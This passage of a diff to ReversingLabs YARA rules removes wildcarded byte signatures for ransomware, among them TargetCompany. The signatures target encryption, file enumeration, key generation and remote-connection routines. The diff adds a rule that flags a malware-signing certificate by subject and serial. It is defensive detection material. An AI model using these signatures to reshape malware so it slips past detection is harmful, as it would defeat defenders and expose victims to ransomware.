-            10 8B 45 ?? 8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ??
-            ?? ?? 73 07 8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF
-            30 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 75 ?? 75 ?? 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50
-            8B 06 52 FF 75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 34 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D
-            ?? FE C1 0F B6 C1 88 4D ?? 3B 45 ?? 0F 82 BB FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$file_loop_3 = {
-            55 8B EC 83 EC ?? 53 56 8B C1 57 89 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 62 01 00 00 8B 5D ?? 32 C0 0F 57 C0 88 45 ?? 66 0F
-            13 45 ?? EB 03 8D 49 ?? 84 C0 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 27 01 00 00 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 13 01 00 00 8B 4D ?? 8B 55 ?? 8B 49 ?? 8B 75 ?? 8B 01
-            6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 EE 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 33 D2 8B D8 90
-            85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 10 8B 45 ??
-            8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ?? ?? ?? 73 07
-            8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ??
-            ?? ?? ?? 85 C0 74 5E 39 75 ?? 75 59 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50 8B 06 52 FF
-            75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 30 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 45 ?? FE C0 88
-            45 ?? 3C ?? 0F 82 BE FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_data_1 = {
-            55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 58 48 83 F8 ?? 77 48 8B 5D ??
-            8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ??
-            FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B
-            47 ?? 33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42
-            ?? 33 D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2
-        }
-		$encrypt_data_2 = {
-            55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 56 48 83 F8 ?? 77 46 8B 5D ??
-            8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75
-            ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 47 ??
-            33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33
-            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2
-        }
-		$encrypt_data_3 = {
-            55 8B EC 53 56 8B 75 ?? 8B D9 39 75 ?? 72 4C 83 3B ?? 77 47 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B 56 50 57 E8 ?? ?? ?? ?? 83
-            C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5F
-            0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 5E 83 C8 ?? 5B 5D C2
-        }
-		$decrypt_data_1 = {
-            55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 53 48 83 F8 ?? 77 55 8B 75 ?? 39 75 ?? 72 4D 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ?? FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ??
-            83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2
-            89 45 ?? 8B 47 ?? 85 F6 74 28 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8B FF 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42 ?? 33
-            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2
-        }
-		$decrypt_data_2 = {
-            55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 51 48 83 F8 ?? 77 53 8B 75 ?? 39 75 ?? 72 4B 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA
-            ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2 89 45
-            ?? 8B 47 ?? 85 F6 74 2A 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8D 64 24 ?? 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33
-            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2
-        }
-		$decrypt_data_3 = {
-            55 8B EC 53 8B D9 83 3B ?? 77 56 56 8B 75 ?? 39 75 ?? 73 09 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B
-            56 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ??
-            83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 83 C8 ?? 5B 5D C2
-        }
-		$decrypt_strings_1 = {
-            55 8B EC 53 56 8B D9 8B F2 57 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ??
-            8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 D1 E9 5F 5E 5B 8D 41 ?? 5D C3
-        }
-		$decrypt_strings_2 = {
-            55 8B EC 53 56 8B D9 57 8B F2 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ??
-            8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 5F D1 E9 5E 8D 41 ?? 5B 5D C3
-        }
-		$decrypt_1 = {
-            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C B7 00 00 00 33 D2 8B 0C 95 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0C
-            95 ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 89 0C 95 ?? ?? ?? ?? 42 81 FA ?? ?? ?? ??
-            7C C0 81 FA ?? ?? ?? ?? 7D 39 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 81 E1 ?? ?? ?? ?? 33 0E 8B C1 D1 E9 83 E0 ?? 8B 04
-            85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 06 83 C6 ?? 81 FE ?? ?? ?? ?? 7C D0 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81
-            E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B
-            0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0
-            ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
-        }
-		$decrypt_2 = {
-            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33
-            0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ??
-            ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ??
-            81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ??
-            7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ??
-            ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ??
-            ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
-        }
-		$decrypt_3 = {
-            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33
-            0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ??
-            ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ??
-            81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ??
-            7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ??
-            ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ??
-            ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
-        }
-		$entrypoint_all = {
-            83 EC ?? E8 ?? ?? ?? ?? 50 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $file_loop_1 and $encrypt_data_1 and $decrypt_data_1 and $decrypt_strings_1 and $decrypt_1 ) or ( $file_loop_2 and $encrypt_data_2 and $decrypt_data_2 and $decrypt_strings_2 and $decrypt_2 ) or ( $file_loop_3 and $encrypt_data_3 and $decrypt_data_3 and $decrypt_3 ) ) and ( $entrypoint_all at pe.entry_point ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALAIS, OOO" and pe.signatures [ i ] . serial == "33:67:1f:1b:cb:d0:f5:e2:31:fc:38:6f:48:95:00:0e" and 1491868800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Targetcompany : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TargetCompany ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7e6983f9-2aca-5cfa-aad6-38aa64fa2062"
-		date = "2021-09-27"
-		modified = "2021-09-27"
+		id = "fa2302c3-4002-5bf0-812b-45298abbda8d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.TargetCompany.yara#L1-L141"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "05fa81afa8aa1e3b9955ad24a274ddef4fb32d678902af7aae6d6c67ed3bf0fd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13746-L13762"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cb522e3084d382c451a8b040095e75582675f90dbb588e370f2f0054f4c2d14b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TargetCompany"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 53 68 ?? ?? ?? ?? 6A ?? 53 6A
-            ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? BF ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8D 75 ?? E8 ?? ?? ??
-            ?? 50 89 5D ?? E8 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59
-            E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 53 68
-            ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 6A ?? 5F 53 57 56 FF B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 57 52 50
-            89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 33 FF 3B F3 89 85
-            ?? ?? ?? ?? 7F ?? 7C ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 33 FF 47 EB ?? B9 ?? ??
-            ?? ?? 3B C1 73 ?? 53 51 56 FF B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 50
-        }
-		$encrypt_files_p2 = {
-            56 FF B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 89 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 3B FB 8B 3D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            89 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 FF B5 ??
-            ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ?? ?? ?? ?? 8D 4D
-            ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 FF B5 ??
-            ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? FF D6 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 86 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 53 53 FF B5 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ??
-            ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53
-            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 01 85
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 11 85 ?? ?? ?? ?? FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50 FF B5 ?? ?? ?? ?? FF D7 8B
-            BD ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ??
-            ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF
-            D6 57 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-        }
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? 53 56 33 F6 57 8D 5D ?? 89 75 ?? E8 ?? ?? ?? ?? 89 75 ?? 56 56 56
-            FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 3B DE 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 FF 6A ?? 8D
-            45 ?? 50 FF 74 BD ?? 53 FF 15 ?? ?? ?? ?? 47 83 FF ?? 72 ?? 56 56 6A ?? 56 56 FF 75
-            ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ??
-            B8 ?? ?? ?? ?? 0F 95 C1 56 49 23 C8 03 C8 81 C9 ?? ?? ?? ?? 51 56 56 56 FF 75 ?? 89
-            4D ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 6A ??
-            5F 8D 45 ?? 50 8D 45 ?? 50 6A ?? 53 89 7D ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            81 4D ?? ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF
-            75 ?? F7 D8 1B C0 50 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 56 56 8D 45 ??
-            50 53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C7 50 FF 75 ?? E8 ?? ?? ??
-            ?? 59 59 8D 4D ?? 51 FF 75 ?? 89 45 ?? 03 C7 50 53 FF 15 ?? ?? ?? ?? 03 7D ?? 39 75
-            ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            39 75 ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ??
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B C9 C3
-        }
-		$remote_connection_p2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 9D ?? ?? ?? ??
-            8B F9 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 45
-            ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 75
-            ?? B8 ?? ?? ?? ?? 50 8D 45 ?? 50 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B F8 85 F6 74 ?? 56 E8 ?? ?? ?? ?? 59 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 59 FF B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 5F 5E 33
-            CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$generate_key = {
-            0F 31 0F AF C8 0F AF CE 0F AF 8D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 33 FF 47 57 53 53
-            8D 85 ?? ?? ?? ?? 50 89 8D ?? ?? ?? ?? FF D6 3B C3 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ??
-            ?? ?? 75 ?? 6A ?? 57 53 53 8D 85 ?? ?? ?? ?? 50 FF D6 3B C3 74 ?? 8D 85 ?? ?? ?? ??
-            50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 59 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C7
-            B9 ?? ?? ?? ?? 8B 11 8B F2 C1 EE ?? 33 F2 69 F6 ?? ?? ?? ?? 03 F0 89 71 ?? 83 C1 ??
-            40 81 F9 ?? ?? ?? ?? 7C ?? 57 A3 ?? ?? ?? ?? FF 15
-        }
-		$find_files_p1 = {
-            8D 85 ?? ?? ?? ?? 53 53 50 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            D6 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 33 F6 0F B7
-            C6 FF 34 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 46 66 83 FE ?? 72 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 0F B7 B5 ?? ?? ?? ?? 8D 34 B5
-        }
-		$find_files_p2 = {
-            FF 36 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D3 FF 36 89 85 ?? ??
-            ?? ?? FF D3 8B 8D ?? ?? ?? ?? 3B C8 0F 84 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 66 83 BD ??
-            ?? ?? ?? ?? 72 ?? C6 85 ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? FF 34 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FE 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ??
-            ?? 72 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 ?? 6A ?? 59 FF B5 ?? ?? ?? ?? 33 C0
-            8B FE F3 AB 66 8B 85 ?? ?? ?? ?? 66 89 46 ?? FF D3 8D 44 00 ?? 50 E8 ?? ?? ?? ?? 59
-            FF B5 ?? ?? ?? ?? 89 46 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? FF
